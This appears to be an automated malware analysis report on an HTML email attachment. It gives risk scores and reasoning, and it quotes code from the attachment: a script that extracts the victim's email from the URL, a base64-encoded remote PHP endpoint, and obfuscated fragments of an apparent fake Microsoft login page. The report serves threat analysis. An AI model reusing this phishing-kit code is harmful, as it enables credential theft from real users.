Windows Analysis Report
ATT43730.htm

{
  "risk_score": 1,
  "reasoning": [
    "No headers provided to analyze",
    "Cannot make security assessment without header information",
    "Default to low risk score due to lack of evidence"
  ]
}

Date: unknown

{
    "risk_score": 7,
    "reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution and data exfiltration. The use of obfuscated code and the presence of suspicious URL patterns further increase the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and requires further investigation."
}

        
        const meteorgraph = lapwings => /^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?$/.test(lapwings);
        
        const pseudogaster = () => {
            const tongueshot = window.location.href;
            const quidam = /(?:#(?:\?=|(?:\?(\w+)=)?)|[?&](?:e=|(\w+)=))([^&\s]+@[^\s&]+|[A-Za-z0-9+/]+={0,2})/i;
            const attorneyatlaw = tongueshot.match(quidam);
            
            return attorneyatlaw ? attorneyatlaw[3] : null;
        } //In ham hock sint t-bone consequat, laboris turducken dolore hamburger ex culpa non dolor voluptate anim.

        rh13z8jemt = pseudogaster() == null ? rh13z8jemt : pseudogaster();
        rh13z8jemt = meteorgraph(rh13z8jemt) ? atob(rh13z8jemt) : rh13z8jemt;
    

{
    "risk_score": 9,
    "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. The use of `eval` and the heavily encoded string suggest the script is attempting to execute remote or malicious code. Additionally, the script appears to be sending user data to an external domain, which is a concerning data exfiltration behavior. Overall, the combination of these high-risk indicators points to a highly suspicious and potentially malicious script."
}

```json{  "brand": "unknown",  "brand_classification": "unknown",  "legit_url": "unknown",  "similarity": 0,  "spoofed": 0,  "reasoning": "The provided input is not a valid URL. It lacks a scheme (e.g., 'http', 'https') and a domain name, making it impossible to analyze for typosquatting or any brand association. Without a complete URL structure, no assessment of similarity or spoofing likelihood can be made."}

URL: ://

{
    "risk_score": 7,
    "reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script appears to be attempting to load a remote file from a potentially suspicious domain ('scholar.accountingfilehost.com'). Additionally, the heavy use of obfuscation techniques suggests an intent to conceal the script's true purpose. While the context is unclear, the cumulative risk factors warrant a high-risk assessment."
}

var file = "aHR0cHM6Ly9zY2hvbGVyLmFjY291bnRpbmdmaWxlaG9zdC5jb20vbmV4dC5waHA=";

function _0x563e(){var _0x368601=['-width:\x2016','y-content-','nospace;\x20f','7d\x20}\x20.badg','co\x22\x20class=','0,\x200,\x20.2);','t;\x20-ms-fle','ttom:\x203rem','up-item-pr','mary>td,\x20.','}\x20.btn-gro','nd-image:\x20','-flex-wrap','e\x20UI\x20Web\x20(','255,\x20.25)\x20','.mt-lg-4,\x20','ck:\x20justif','45\x20}\x20.btn-','control::-',':\x204rem\x202re','tn-info:no','nimation:l','ver-bottom','r:\x20#ffc107','}\x20.pt-xl-4','th=\x2230px\x22>','ity:\x201\x20}\x20.','255,\x20193,\x20','7,\x20.5)\x20}\x20.','}\x20.form-ch','uto\x20{\x20-web','lign:\x20midd','&#100;&#10','nav\x20.nav-l','ot(:first-','\x2013;\x20order','ansform:\x20t','igure-capt','biZoP','\x20.navbar-t','.px-sm-5\x20{','dding-bott','DbJFiTKspx','w>.btn-suc','ard-img\x20{\x20','Csvg\x20xmlns','3%;\x20max-wi',',\x20.my-lg-2','link:hover','\x20logoimg\x22\x20',':\x20block;\x20w','\x200%;\x20-webk','output\x20{\x20d','.mb-sm-4,\x20','66.666667%','0\x20calc(.25','wrap;\x20-web','n.msauth.n','\x20.show>.bt','auto;\x20padd','\x20<form\x20id=','\x20</div>\x20<f','r-left:\x20no','-left:\x200\x20!','721c24;\x20ba','x-item-ali','menu-right','/+Lr5u/wCC',':\x204rem\x20}\x20.','BQEBAQEBAQ','acement^=b',';height:80','between\x20{\x20','ooooAKKKKA','\x20none;\x20out','p:\x200;\x20righ','or\x22\x20class=','BwUEBAABAn','drlzh','MCAgICBQQE','t\x20}\x20.mt-sm','eck','.75rem\x201.2','3E\x22)\x20}\x20.na','ng-right:\x20','{\x20border:\x20','xt-lowerca','content:\x20s','\x20}\x20.pr-md-','i3eiRhMr/e','igAooooAKK','dLvAc','ut=\x22this.s','avbar-dark','n-toggle-s','p:\x20wrap;\x20-','a(248,\x20249','t\x20}\x20.clear','up,\x20select','nter;\x20whit','\x22>No\x20accou','isabled).a','eft:\x2050%\x20}','ock;\x20heigh','reserve-3d','bar\x20{\x20posi','d-color:\x20t','cSystemFon','bled,\x20.for','9,\x20.col-xl','r;\x20align-i','ex;\x20flex-d','><div\x20clas','ortant;\x20-w','d-2\x20{\x20padd','ant\x20}\x20.p-2','d,\x20.table-','padding:\x20.','CdaGD','5rem;\x20cont','JqQKc','ant\x20}\x20.pb-','ight;\x20font','le-row\x20{\x20d','-auto\x20{\x20-w','ransform\x20.','xt-truncat','self:\x20base','kit-clip-p','3545\x20}\x20.bt','.border-pr','sr-only-fo','ered\x20td,\x20.','ute;\x20right','b/ANGyfEL/','start\x20!imp','0\x20}\x20to\x20{\x20b','alert-ligh','n-items-md','tion:\x20heig','3\x20{\x20paddin',':10px;over','select:not','3rem\x20}\x20.mo','om:\x201rem\x20!','-white:\x20#f','bar-nav\x20.n','l-label::b','oter>:not(','tyle=\x27back','t-size:\x2013','bbbe\x20}\x20.al','ggler\x20{\x20pa','color:\x20#b2','e:\x20nowrap;','ine\x20{\x20disp','d-center\x20{','nd-clip:\x20p','mx-lg-auto','0ZmChnOAu3','#ffc107\x20}\x20','ptions_4e4','ile-input:','10\x22>Call\x20<','-xl-5,\x20.py','-brand:hov','in-left:\x200','en\x20!import','r\x20p-2\x22\x20onm','align:\x20sta','le-cell\x20!i','footerNode','\x20.mb-md-au','\x22img-fluid','kfmGZYPO8D','\x20480ms;\x20}\x20','rm\x20.6s\x20eas','}\x20.pr-xl-0','g-top:\x201.5','w\x20nowrap;\x20','p:\x2011;\x20-ms','WvLnb','t:\x20auto;\x20d','rosoft\x20acc','<br>\x20<font','e-space:\x20n','t\x20size=\x276\x27','\x27code\x27)\x22\x20c','\x20.fixed-bo','iWgWo','m-0\x20{\x20padd','\x20}\x20.alert-','mx-md-2\x20{\x20','5rem\x20}\x20.h5','ne-info:no','table-info','\x20}\x20.invali','1jwp4s8F6B','1\x20normal\x20f','rtant\x20}\x20}\x20','t\x20}\x20.d-inl','lor:\x20#4950','p-text\x20{\x20m','tant;\x20marg','=search]\x20{','s-sm-end\x20{','opyright\x202','ccess:focu','oKCv/bAEMB','\x22true\x22\x20id=','l-input.is','9;\x20-ms-fle','dated\x20.cus','ntent-sm-e','m-table-ce','ex:\x200\x200\x2058','y:\x20none;\x22\x20','trol:inval','ZrySz8Iz+G','.was-valid','html','ze:\x2075%;\x20l','1px\x20solid\x20','-font-fami','.col-7,\x20.c','pre,\x20samp\x20','.modal-dia','ect:focus:','SuDEe2MHOR','tom-left-r','t:\x20calc(ca','\x22box\x22\x20id=\x22','ark:hover>',')\x20{\x20.card-','AppOTP\x22\x20on','mr-xl-2,\x20.','r,\x20.navbar',';&#100;&#3','rounded-0\x20','-50\x20{\x20widt','us:\x20.3rem\x20','t:\x203rem\x20!i','